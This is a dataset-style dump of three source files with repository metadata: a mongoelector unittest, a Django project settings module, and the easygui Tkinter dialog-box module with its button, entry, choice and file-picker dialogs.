repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
zebpalmer/MongoElector | tests/test_mongoelector.py | 1 | 1505 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_mongoelector
----------------------------------
Tests for `mongoelector` module.
"""
import unittest
from time import sleep
from pymongo import MongoClient
from mongoelector import MongoElector
from random import randint
class TestMongoelector(unittest.TestCase):
"""Test Mongoelector Functionality"""
def setUp(self):
"""setup unittests"""
db = getattr(MongoClient(), "ml_unittest")
db.ml_unittest.electorlocks.drop()
def tearDown(self):
"""teardown unittests"""
db = getattr(MongoClient(), "ml_unittest")
db.electorlocks.drop()
def test_000_init(self):
"""Smoke test"""
db = getattr(MongoClient(), "ml_unittest")
MongoElector('test_001_init', db)
def test_001_run(self):
db = getattr(MongoClient(), "ml_unittest")
m1 = MongoElector('test_001_run_' + str(randint(0,10000)), db,
ttl=15)
m1.start()
c = 0
while c < 30 and m1.ismaster is False:
c += 1
sleep(1)
self.assertTrue(m1.ismaster)
self.assertTrue(m1.running)
m1.poll()
self.assertIsInstance(m1.cluster_detail, dict)
m1.stop()
m1.poll()
c = 0
while c < 30 and m1.ismaster is True:
c += 1
sleep(1)
self.assertFalse(m1.ismaster)
if __name__ == '__main__':
import sys
sys.exit(unittest.main())
| lgpl-3.0 | -8,631,035,411,384,870,000 | 21.80303 | 70 | 0.55814 | false | 3.716049 | true | false | false |
mhotwagner/backstage | backstage/settings/base.py | 1 | 3790 | """
Django settings for backstage project.
Generated by 'django-admin startproject' using Django 1.9.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
from unipath import Path
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
# BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
BASE_DIR = Path(__file__).ancestor(3)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '45h_l__1dn&5sr(gb)l*x9j6fw=3okecd10ilotci-95gy1m^o'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*',]
# Application definition
INSTALLED_APPS = [
'jet',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_extensions',
'adminsortable2',
'storages',
'rest_framework',
'django_assets',
'imagekit',
'solo',
'ckeditor',
'api',
'facade',
'opere',
'foti',
'scritti',
'frontend',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
]
}
ROOT_URLCONF = 'urls.base'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'backstage.wsgi.application'
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
CKEDITOR_JQUERY_URL = '//ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js'
CKEDITOR_UPLOAD_PATH = "uploads/"
| mit | -8,667,195,020,869,112,000 | 25.319444 | 91 | 0.689182 | false | 3.522305 | false | false | false |
draperjames/qtpandas | qtpandas/ui/fallback/easygui/boxes/base_boxes.py | 1 | 39397 | """
.. moduleauthor:: Stephen Raymond Ferg and Robert Lugg (active)
.. default-domain:: py
.. highlight:: python
Version |release|
"""
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from builtins import zip
from builtins import dict
from builtins import str
from builtins import range
from builtins import int
from future import standard_library
standard_library.install_aliases()
from builtins import object
import os
import string
from . import utils as ut
from .utils import *
from . import state as st
# Initialize some global variables that will be reset later
__choiceboxMultipleSelect = None
__replyButtonText = None
__choiceboxResults = None
__firstWidget = None
__enterboxText = None
__enterboxDefaultText = ""
__multenterboxText = ""
choiceboxChoices = None
choiceboxWidget = None
entryWidget = None
boxRoot = None
# -------------------------------------------------------------------
# buttonbox
# -------------------------------------------------------------------
def buttonbox(msg="", title=" ", choices=("Button[1]", "Button[2]", "Button[3]"), image=None, root=None, default_choice=None, cancel_choice=None):
"""
Display a msg, a title, an image, and a set of buttons.
The buttons are defined by the members of the choices list.
:param str msg: the msg to be displayed
:param str title: the window title
:param list choices: a list or tuple of the choices to be displayed
:param str image: Filename of image to display
:param str default_choice: The choice you want highlighted when the gui appears
:param str cancel_choice: If the user presses the 'X' close, which button should be pressed
:return: the text of the button that the user selected
"""
global boxRoot, __replyButtonText, buttonsFrame
# If default is not specified, select the first button. This matches old
# behavior.
if default_choice is None:
default_choice = choices[0]
# Initialize __replyButtonText to the first choice.
# This is what will be used if the window is closed by the close button.
__replyButtonText = choices[0]
if root:
root.withdraw()
boxRoot = Toplevel(master=root)
boxRoot.withdraw()
else:
boxRoot = Tk()
boxRoot.withdraw()
boxRoot.title(title)
boxRoot.iconname('Dialog')
boxRoot.geometry(st.rootWindowPosition)
boxRoot.minsize(400, 100)
# ------------- define the messageFrame ---------------------------------
messageFrame = Frame(master=boxRoot)
messageFrame.pack(side=TOP, fill=BOTH)
# ------------- define the imageFrame ---------------------------------
if image:
tk_Image = None
try:
tk_Image = ut.load_tk_image(image)
except Exception as inst:
print(inst)
if tk_Image:
imageFrame = Frame(master=boxRoot)
imageFrame.pack(side=TOP, fill=BOTH)
label = Label(imageFrame, image=tk_Image)
label.image = tk_Image # keep a reference!
label.pack(side=TOP, expand=YES, fill=X, padx='1m', pady='1m')
# ------------- define the buttonsFrame ---------------------------------
buttonsFrame = Frame(master=boxRoot)
buttonsFrame.pack(side=TOP, fill=BOTH)
# -------------------- place the widgets in the frames -------------------
messageWidget = Message(messageFrame, text=msg, width=400)
messageWidget.configure(
font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE))
messageWidget.pack(side=TOP, expand=YES, fill=X, padx='3m', pady='3m')
__put_buttons_in_buttonframe(choices, default_choice, cancel_choice)
# -------------- the action begins -----------
boxRoot.deiconify()
boxRoot.mainloop()
boxRoot.destroy()
if root:
root.deiconify()
return __replyButtonText
def bindArrows(widget):
widget.bind("<Down>", tabRight)
widget.bind("<Up>", tabLeft)
widget.bind("<Right>", tabRight)
widget.bind("<Left>", tabLeft)
def tabRight(event):
boxRoot.event_generate("<Tab>")
def tabLeft(event):
boxRoot.event_generate("<Shift-Tab>")
# -----------------------------------------------------------------------
# __multfillablebox
# -----------------------------------------------------------------------
def __multfillablebox(msg="Fill in values for the fields.", title=" ", fields=(), values=(), mask=None):
global boxRoot, __multenterboxText, __multenterboxDefaultText, cancelButton, entryWidget, okButton
choices = ["OK", "Cancel"]
if len(fields) == 0:
return None
fields = list(fields[:]) # convert possible tuples to a list
values = list(values[:]) # convert possible tuples to a list
# TODO RL: The following seems incorrect when values>fields. Replace
# below with zip?
if len(values) == len(fields):
pass
elif len(values) > len(fields):
fields = fields[0:len(values)]
else:
while len(values) < len(fields):
values.append("")
boxRoot = Tk()
boxRoot.protocol('WM_DELETE_WINDOW', __multenterboxQuit)
boxRoot.title(title)
boxRoot.iconname('Dialog')
boxRoot.geometry(st.rootWindowPosition)
boxRoot.bind("<Escape>", __multenterboxCancel)
# -------------------- put subframes in the boxRoot --------------------
messageFrame = Frame(master=boxRoot)
messageFrame.pack(side=TOP, fill=BOTH)
# -------------------- the msg widget ----------------------------
messageWidget = Message(messageFrame, width="4.5i", text=msg)
messageWidget.configure(
font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE))
messageWidget.pack(side=RIGHT, expand=1, fill=BOTH, padx='3m', pady='3m')
global entryWidgets
entryWidgets = list()
lastWidgetIndex = len(fields) - 1
for widgetIndex in range(len(fields)):
argFieldName = fields[widgetIndex]
argFieldValue = values[widgetIndex]
entryFrame = Frame(master=boxRoot)
entryFrame.pack(side=TOP, fill=BOTH)
# --------- entryWidget ----------------------------------------------
labelWidget = Label(entryFrame, text=argFieldName)
labelWidget.pack(side=LEFT)
entryWidget = Entry(entryFrame, width=40, highlightthickness=2)
entryWidgets.append(entryWidget)
entryWidget.configure(
font=(st.PROPORTIONAL_FONT_FAMILY, st.TEXT_ENTRY_FONT_SIZE))
entryWidget.pack(side=RIGHT, padx="3m")
bindArrows(entryWidget)
entryWidget.bind("<Return>", __multenterboxGetText)
entryWidget.bind("<Escape>", __multenterboxCancel)
# for the last entryWidget, if this is a multpasswordbox,
# show the contents as just asterisks
if widgetIndex == lastWidgetIndex:
if mask:
entryWidgets[widgetIndex].configure(show=mask)
# put text into the entryWidget
if argFieldValue is None:
argFieldValue = ''
entryWidgets[widgetIndex].insert(0, '{}'.format(argFieldValue))
widgetIndex += 1
# ------------------ ok button -------------------------------
buttonsFrame = Frame(master=boxRoot)
buttonsFrame.pack(side=BOTTOM, fill=BOTH)
okButton = Button(buttonsFrame, takefocus=1, text="OK")
bindArrows(okButton)
okButton.pack(
expand=1, side=LEFT, padx='3m', pady='3m', ipadx='2m', ipady='1m')
# for the commandButton, bind activation events to the activation event
# handler
commandButton = okButton
handler = __multenterboxGetText
for selectionEvent in st.STANDARD_SELECTION_EVENTS:
commandButton.bind("<%s>" % selectionEvent, handler)
# ------------------ cancel button -------------------------------
cancelButton = Button(buttonsFrame, takefocus=1, text="Cancel")
bindArrows(cancelButton)
cancelButton.pack(
expand=1, side=RIGHT, padx='3m', pady='3m', ipadx='2m', ipady='1m')
# for the commandButton, bind activation events to the activation event
# handler
commandButton = cancelButton
handler = __multenterboxCancel
for selectionEvent in st.STANDARD_SELECTION_EVENTS:
commandButton.bind("<%s>" % selectionEvent, handler)
# ------------------- time for action! -----------------
entryWidgets[0].focus_force() # put the focus on the entryWidget
boxRoot.mainloop() # run it!
# -------- after the run has completed ----------------------------------
boxRoot.destroy() # button_click didn't destroy boxRoot, so we do it now
return __multenterboxText
# -----------------------------------------------------------------------
# __multenterboxGetText
# -----------------------------------------------------------------------
def __multenterboxGetText(event):
global __multenterboxText
__multenterboxText = list()
for entryWidget in entryWidgets:
__multenterboxText.append(entryWidget.get())
boxRoot.quit()
def __multenterboxCancel(event):
global __multenterboxText
__multenterboxText = None
boxRoot.quit()
def __multenterboxQuit():
__multenterboxCancel(None)
def __fillablebox(msg, title="", default="", mask=None, image=None, root=None):
"""
Show a box in which a user can enter some text.
You may optionally specify some default text, which will appear in the
enterbox when it is displayed.
Returns the text that the user entered, or None if he cancels the operation.
"""
global boxRoot, __enterboxText, __enterboxDefaultText
global cancelButton, entryWidget, okButton
if title is None:
title == ""
if default is None:
default = ""
__enterboxDefaultText = default
__enterboxText = __enterboxDefaultText
if root:
root.withdraw()
boxRoot = Toplevel(master=root)
boxRoot.withdraw()
else:
boxRoot = Tk()
boxRoot.withdraw()
boxRoot.protocol('WM_DELETE_WINDOW', __enterboxQuit)
boxRoot.title(title)
boxRoot.iconname('Dialog')
boxRoot.geometry(st.rootWindowPosition)
boxRoot.bind("<Escape>", __enterboxCancel)
# ------------- define the messageFrame ---------------------------------
messageFrame = Frame(master=boxRoot)
messageFrame.pack(side=TOP, fill=BOTH)
# ------------- define the imageFrame ---------------------------------
try:
tk_Image = ut.load_tk_image(image)
except Exception as inst:
print(inst)
tk_Image = None
if tk_Image:
imageFrame = Frame(master=boxRoot)
imageFrame.pack(side=TOP, fill=BOTH)
label = Label(imageFrame, image=tk_Image)
label.image = tk_Image # keep a reference!
label.pack(side=TOP, expand=YES, fill=X, padx='1m', pady='1m')
# ------------- define the buttonsFrame ---------------------------------
buttonsFrame = Frame(master=boxRoot)
buttonsFrame.pack(side=TOP, fill=BOTH)
# ------------- define the entryFrame ---------------------------------
entryFrame = Frame(master=boxRoot)
entryFrame.pack(side=TOP, fill=BOTH)
# ------------- define the buttonsFrame ---------------------------------
buttonsFrame = Frame(master=boxRoot)
buttonsFrame.pack(side=TOP, fill=BOTH)
# -------------------- the msg widget ----------------------------
messageWidget = Message(messageFrame, width="4.5i", text=msg)
messageWidget.configure(
font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE))
messageWidget.pack(side=RIGHT, expand=1, fill=BOTH, padx='3m', pady='3m')
# --------- entryWidget ----------------------------------------------
entryWidget = Entry(entryFrame, width=40)
bindArrows(entryWidget)
entryWidget.configure(
font=(st.PROPORTIONAL_FONT_FAMILY, st.TEXT_ENTRY_FONT_SIZE))
if mask:
entryWidget.configure(show=mask)
entryWidget.pack(side=LEFT, padx="3m")
entryWidget.bind("<Return>", __enterboxGetText)
entryWidget.bind("<Escape>", __enterboxCancel)
# put text into the entryWidget
entryWidget.insert(0, __enterboxDefaultText)
# ------------------ ok button -------------------------------
okButton = Button(buttonsFrame, takefocus=1, text="OK")
bindArrows(okButton)
okButton.pack(
expand=1, side=LEFT, padx='3m', pady='3m', ipadx='2m', ipady='1m')
# for the commandButton, bind activation events to the activation event
# handler
commandButton = okButton
handler = __enterboxGetText
for selectionEvent in st.STANDARD_SELECTION_EVENTS:
commandButton.bind("<{}>".format(selectionEvent), handler)
# ------------------ cancel button -------------------------------
cancelButton = Button(buttonsFrame, takefocus=1, text="Cancel")
bindArrows(cancelButton)
cancelButton.pack(
expand=1, side=RIGHT, padx='3m', pady='3m', ipadx='2m', ipady='1m')
# for the commandButton, bind activation events to the activation event
# handler
commandButton = cancelButton
handler = __enterboxCancel
for selectionEvent in st.STANDARD_SELECTION_EVENTS:
commandButton.bind("<{}>".format(selectionEvent), handler)
# ------------------- time for action! -----------------
entryWidget.focus_force() # put the focus on the entryWidget
boxRoot.deiconify()
boxRoot.mainloop() # run it!
# -------- after the run has completed ----------------------------------
if root:
root.deiconify()
boxRoot.destroy() # button_click didn't destroy boxRoot, so we do it now
return __enterboxText
def __enterboxGetText(event):
global __enterboxText
__enterboxText = entryWidget.get()
boxRoot.quit()
def __enterboxRestore(event):
global entryWidget
entryWidget.delete(0, len(entryWidget.get()))
entryWidget.insert(0, __enterboxDefaultText)
def __enterboxCancel(event):
global __enterboxText
__enterboxText = None
boxRoot.quit()
def __enterboxQuit():
return __enterboxCancel(None)
# -----------------------------------------------------------------------
# __choicebox
# -----------------------------------------------------------------------
def __choicebox(msg, title, choices):
"""
internal routine to support choicebox() and multchoicebox()
"""
global boxRoot, __choiceboxResults, choiceboxWidget, defaultText
global choiceboxWidget, choiceboxChoices
# -------------------------------------------------------------------
# If choices is a tuple, we make it a list so we can sort it.
# If choices is already a list, we make a new list, so that when
# we sort the choices, we don't affect the list object that we
# were given.
# -------------------------------------------------------------------
choices = list(choices[:])
if len(choices) == 0:
choices = ["Program logic error - no choices were specified."]
defaultButtons = ["OK", "Cancel"]
choices = [str(c) for c in choices]
# TODO RL: lines_to_show is set to a min and then set to 20 right after
# that. Figure out why.
lines_to_show = min(len(choices), 20)
lines_to_show = 20
if title is None:
title = ""
# Initialize __choiceboxResults
# This is the value that will be returned if the user clicks the close icon
__choiceboxResults = None
boxRoot = Tk()
# RL: Removed so top-level program can be closed with an 'x'
boxRoot.protocol('WM_DELETE_WINDOW', __choiceboxQuit)
screen_width = boxRoot.winfo_screenwidth()
screen_height = boxRoot.winfo_screenheight()
root_width = int((screen_width * 0.8))
root_height = int((screen_height * 0.5))
root_xpos = int((screen_width * 0.1))
root_ypos = int((screen_height * 0.05))
boxRoot.title(title)
boxRoot.iconname('Dialog')
st.rootWindowPosition = "+0+0"
boxRoot.geometry(st.rootWindowPosition)
boxRoot.expand = NO
boxRoot.minsize(root_width, root_height)
st.rootWindowPosition = '+{0}+{1}'.format(root_xpos, root_ypos)
boxRoot.geometry(st.rootWindowPosition)
# ---------------- put the frames in the window --------------------------
message_and_buttonsFrame = Frame(master=boxRoot)
message_and_buttonsFrame.pack(side=TOP, fill=X, expand=NO)
messageFrame = Frame(message_and_buttonsFrame)
messageFrame.pack(side=LEFT, fill=X, expand=YES)
buttonsFrame = Frame(message_and_buttonsFrame)
buttonsFrame.pack(side=RIGHT, expand=NO, pady=0)
choiceboxFrame = Frame(master=boxRoot)
choiceboxFrame.pack(side=BOTTOM, fill=BOTH, expand=YES)
# -------------------------- put the widgets in the frames ---------------
# ---------- put a msg widget in the msg frame-------------------
messageWidget = Message(
messageFrame, anchor=NW, text=msg, width=int(root_width * 0.9))
messageWidget.configure(
font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE))
messageWidget.pack(side=LEFT, expand=YES, fill=BOTH, padx='1m', pady='1m')
# -------- put the choiceboxWidget in the choiceboxFrame ----------------
choiceboxWidget = Listbox(choiceboxFrame, height=lines_to_show, borderwidth="1m", relief="flat", bg="white"
)
if __choiceboxMultipleSelect:
choiceboxWidget.configure(selectmode=MULTIPLE)
choiceboxWidget.configure(
font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE))
# add a vertical scrollbar to the frame
rightScrollbar = Scrollbar(
choiceboxFrame, orient=VERTICAL, command=choiceboxWidget.yview)
choiceboxWidget.configure(yscrollcommand=rightScrollbar.set)
# add a horizontal scrollbar to the frame
bottomScrollbar = Scrollbar(
choiceboxFrame, orient=HORIZONTAL, command=choiceboxWidget.xview)
choiceboxWidget.configure(xscrollcommand=bottomScrollbar.set)
# pack the Listbox and the scrollbars. Note that although we must define
# the textArea first, we must pack it last, so that the bottomScrollbar will
# be located properly.
bottomScrollbar.pack(side=BOTTOM, fill=X)
rightScrollbar.pack(side=RIGHT, fill=Y)
choiceboxWidget.pack(
side=LEFT, padx="1m", pady="1m", expand=YES, fill=BOTH)
# ---------------------------------------------------
# sort the choices
# eliminate duplicates
# put the choices into the choicebox Widget
# ---------------------------------------------------
choices = ut.lower_case_sort(choices)
lastInserted = None
choiceboxChoices = list()
for choice in choices:
if choice == lastInserted:
continue
else:
choiceboxWidget.insert(END, choice)
choiceboxChoices.append(choice)
lastInserted = choice
boxRoot.bind('<Any-Key>', KeyboardListener)
# put the buttons in the buttonsFrame
if len(choices):
okButton = Button(
buttonsFrame, takefocus=YES, text="OK", height=1, width=6)
bindArrows(okButton)
okButton.pack(
expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m")
# for the commandButton, bind activation events to the activation event
# handler
commandButton = okButton
handler = __choiceboxGetChoice
for selectionEvent in st.STANDARD_SELECTION_EVENTS:
commandButton.bind("<%s>" % selectionEvent, handler)
# now bind the keyboard events
choiceboxWidget.bind("<Return>", __choiceboxGetChoice)
choiceboxWidget.bind("<Double-Button-1>", __choiceboxGetChoice)
else:
# now bind the keyboard events
choiceboxWidget.bind("<Return>", __choiceboxCancel)
choiceboxWidget.bind("<Double-Button-1>", __choiceboxCancel)
cancelButton = Button(
buttonsFrame, takefocus=YES, text="Cancel", height=1, width=6)
bindArrows(cancelButton)
cancelButton.pack(
expand=NO, side=BOTTOM, padx='2m', pady='1m', ipady="1m", ipadx="2m")
# for the commandButton, bind activation events to the activation event
# handler
commandButton = cancelButton
handler = __choiceboxCancel
for selectionEvent in st.STANDARD_SELECTION_EVENTS:
commandButton.bind("<%s>" % selectionEvent, handler)
# add special buttons for multiple select features
if len(choices) and __choiceboxMultipleSelect:
selectionButtonsFrame = Frame(messageFrame)
selectionButtonsFrame.pack(side=RIGHT, fill=Y, expand=NO)
selectAllButton = Button(
selectionButtonsFrame, text="Select All", height=1, width=6)
bindArrows(selectAllButton)
selectAllButton.bind("<Button-1>", __choiceboxSelectAll)
selectAllButton.pack(
expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m")
clearAllButton = Button(
selectionButtonsFrame, text="Clear All", height=1, width=6)
bindArrows(clearAllButton)
clearAllButton.bind("<Button-1>", __choiceboxClearAll)
clearAllButton.pack(
expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m")
# -------------------- bind some keyboard events -------------------------
boxRoot.bind("<Escape>", __choiceboxCancel)
# --------------------- the action begins --------------------------------
# put the focus on the choiceboxWidget, and the select highlight on the
# first item
choiceboxWidget.select_set(0)
choiceboxWidget.focus_force()
# --- run it! -----
boxRoot.mainloop()
try:
boxRoot.destroy()
except:
pass
return __choiceboxResults
def __choiceboxGetChoice(event):
global boxRoot, __choiceboxResults, choiceboxWidget
if __choiceboxMultipleSelect:
__choiceboxResults = [
choiceboxWidget.get(index) for index in choiceboxWidget.curselection()]
else:
choice_index = choiceboxWidget.curselection()
__choiceboxResults = choiceboxWidget.get(choice_index)
boxRoot.quit()
def __choiceboxSelectAll(event):
global choiceboxWidget, choiceboxChoices
choiceboxWidget.selection_set(0, len(choiceboxChoices) - 1)
def __choiceboxClearAll(event):
global choiceboxWidget, choiceboxChoices
choiceboxWidget.selection_clear(0, len(choiceboxChoices) - 1)
def __choiceboxCancel(event):
global boxRoot, __choiceboxResults
__choiceboxResults = None
boxRoot.quit()
def __choiceboxQuit():
__choiceboxCancel(None)
def KeyboardListener(event):
global choiceboxChoices, choiceboxWidget
key = event.keysym
if len(key) <= 1:
if key in string.printable:
# Find the key in the list.
# before we clear the list, remember the selected member
try:
start_n = int(choiceboxWidget.curselection()[0])
except IndexError:
start_n = -1
# clear the selection.
choiceboxWidget.selection_clear(0, 'end')
# start from previous selection +1
for n in range(start_n + 1, len(choiceboxChoices)):
item = choiceboxChoices[n]
if item[0].lower() == key.lower():
choiceboxWidget.selection_set(first=n)
choiceboxWidget.see(n)
return
else:
# has not found it so loop from top
for n, item in enumerate(choiceboxChoices):
if item[0].lower() == key.lower():
choiceboxWidget.selection_set(first=n)
choiceboxWidget.see(n)
return
# nothing matched -- we'll look for the next logical choice
for n, item in enumerate(choiceboxChoices):
if item[0].lower() > key.lower():
if n > 0:
choiceboxWidget.selection_set(first=(n - 1))
else:
choiceboxWidget.selection_set(first=0)
choiceboxWidget.see(n)
return
# still no match (nothing was greater than the key)
# we set the selection to the first item in the list
lastIndex = len(choiceboxChoices) - 1
choiceboxWidget.selection_set(first=lastIndex)
choiceboxWidget.see(lastIndex)
return
# -------------------------------------------------------------------
# diropenbox
# -------------------------------------------------------------------
def diropenbox(msg=None, title=None, default=None):
"""
A dialog to get a directory name.
Note that the msg argument, if specified, is ignored.
Returns the name of a directory, or None if user chose to cancel.
If the "default" argument specifies a directory name, and that
directory exists, then the dialog box will start with that directory.
:param str msg: the msg to be displayed
:param str title: the window title
:param str default: starting directory when dialog opens
:return: Normalized path selected by user
"""
title = getFileDialogTitle(msg, title)
localRoot = Tk()
localRoot.withdraw()
if not default:
default = None
f = ut.tk_FileDialog.askdirectory(
parent=localRoot, title=title, initialdir=default, initialfile=None
)
localRoot.destroy()
if not f:
return None
return os.path.normpath(f)
# -------------------------------------------------------------------
# getFileDialogTitle
# -------------------------------------------------------------------
def getFileDialogTitle(msg, title):
"""
Create nicely-formatted string based on arguments msg and title
:param msg: the msg to be displayed
:param title: the window title
:return: None
"""
if msg and title:
return "%s - %s" % (title, msg)
if msg and not title:
return str(msg)
if title and not msg:
return str(title)
return None # no message and no title
# -------------------------------------------------------------------
# class FileTypeObject for use with fileopenbox
# -------------------------------------------------------------------
class FileTypeObject(object):
def __init__(self, filemask):
if len(filemask) == 0:
raise AssertionError('Filetype argument is empty.')
self.masks = list()
if isinstance(filemask, ut.str): # a str or unicode
self.initializeFromString(filemask)
elif isinstance(filemask, list):
if len(filemask) < 2:
raise AssertionError('Invalid filemask.\n'
+ 'List contains less than 2 members: "{}"'.format(filemask))
else:
self.name = filemask[-1]
self.masks = list(filemask[:-1])
else:
raise AssertionError('Invalid filemask: "{}"'.format(filemask))
def __eq__(self, other):
if self.name == other.name:
return True
return False
def add(self, other):
for mask in other.masks:
if mask in self.masks:
pass
else:
self.masks.append(mask)
def toTuple(self):
return self.name, tuple(self.masks)
def isAll(self):
if self.name == "All files":
return True
return False
def initializeFromString(self, filemask):
# remove everything except the extension from the filemask
self.ext = os.path.splitext(filemask)[1]
if self.ext == "":
self.ext = ".*"
if self.ext == ".":
self.ext = ".*"
self.name = self.getName()
self.masks = ["*" + self.ext]
def getName(self):
e = self.ext
file_types = {".*": "All", ".txt": "Text",
".py": "Python", ".pyc": "Python", ".xls": "Excel"}
if e in file_types:
return '{} files'.format(file_types[e])
if e.startswith("."):
return '{} files'.format(e[1:].upper())
return '{} files'.format(e.upper())
# -------------------------------------------------------------------
# fileopenbox
# -------------------------------------------------------------------
def fileopenbox(msg=None, title=None, default='*', filetypes=None, multiple=False):
"""
A dialog to get a file name.
**About the "default" argument**
The "default" argument specifies a filepath that (normally)
contains one or more wildcards.
fileopenbox will display only files that match the default filepath.
If omitted, defaults to "\*" (all files in the current directory).
WINDOWS EXAMPLE::
...default="c:/myjunk/*.py"
will open in directory c:\\myjunk\\ and show all Python files.
WINDOWS EXAMPLE::
...default="c:/myjunk/test*.py"
will open in directory c:\\myjunk\\ and show all Python files
whose names begin with "test".
Note that on Windows, fileopenbox automatically changes the path
separator to the Windows path separator (backslash).
**About the "filetypes" argument**
If specified, it should contain a list of items,
where each item is either:
- a string containing a filemask # e.g. "\*.txt"
- a list of strings, where all of the strings except the last one
are filemasks (each beginning with "\*.",
such as "\*.txt" for text files, "\*.py" for Python files, etc.).
and the last string contains a filetype description
EXAMPLE::
filetypes = ["*.css", ["*.htm", "*.html", "HTML files"] ]
.. note:: If the filetypes list does not contain ("All files","*"), it will be added.
If the filetypes list does not contain a filemask that includes
the extension of the "default" argument, it will be added.
For example, if default="\*abc.py"
and no filetypes argument was specified, then
"\*.py" will automatically be added to the filetypes argument.
:param str msg: the msg to be displayed.
:param str title: the window title
:param str default: filepath with wildcards
:param object filetypes: filemasks that a user can choose, e.g. "\*.txt"
:param bool multiple: If true, more than one file can be selected
:return: the name of a file, or None if user chose to cancel
"""
localRoot = Tk()
localRoot.withdraw()
initialbase, initialfile, initialdir, filetypes = fileboxSetup(
default, filetypes)
# ------------------------------------------------------------
# if initialfile contains no wildcards; we don't want an
# initial file. It won't be used anyway.
# Also: if initialbase is simply "*", we don't want an
# initialfile; it is not doing any useful work.
# ------------------------------------------------------------
if (initialfile.find("*") < 0) and (initialfile.find("?") < 0):
initialfile = None
elif initialbase == "*":
initialfile = None
func = ut.tk_FileDialog.askopenfilenames if multiple else ut.tk_FileDialog.askopenfilename
ret_val = func(parent=localRoot, title=getFileDialogTitle(msg, title), initialdir=initialdir, initialfile=initialfile, filetypes=filetypes
)
if multiple:
f = [os.path.normpath(x) for x in localRoot.tk.splitlist(ret_val)]
else:
f = os.path.normpath(ret_val)
localRoot.destroy()
if not f:
return None
return f
# -------------------------------------------------------------------
# filesavebox
# -------------------------------------------------------------------
def filesavebox(msg=None, title=None, default="", filetypes=None):
"""
A file to get the name of a file to save.
Returns the name of a file, or None if user chose to cancel.
The "default" argument should contain a filename (i.e. the
current name of the file to be saved). It may also be empty,
or contain a filemask that includes wildcards.
The "filetypes" argument works like the "filetypes" argument to
fileopenbox.
:param str msg: the msg to be displayed.
:param str title: the window title
:param str default: default filename to return
:param object filetypes: filemasks that a user can choose, e.g. " \*.txt"
:return: the name of a file, or None if user chose to cancel
"""
localRoot = Tk()
localRoot.withdraw()
initialbase, initialfile, initialdir, filetypes = fileboxSetup(
default, filetypes)
f = ut.tk_FileDialog.asksaveasfilename(parent=localRoot, title=getFileDialogTitle(msg, title), initialfile=initialfile, initialdir=initialdir, filetypes=filetypes
)
localRoot.destroy()
if not f:
return None
return os.path.normpath(f)
# -------------------------------------------------------------------
#
# fileboxSetup
#
# -------------------------------------------------------------------
def fileboxSetup(default, filetypes):
if not default:
default = os.path.join(".", "*")
initialdir, initialfile = os.path.split(default)
if not initialdir:
initialdir = "."
if not initialfile:
initialfile = "*"
initialbase, initialext = os.path.splitext(initialfile)
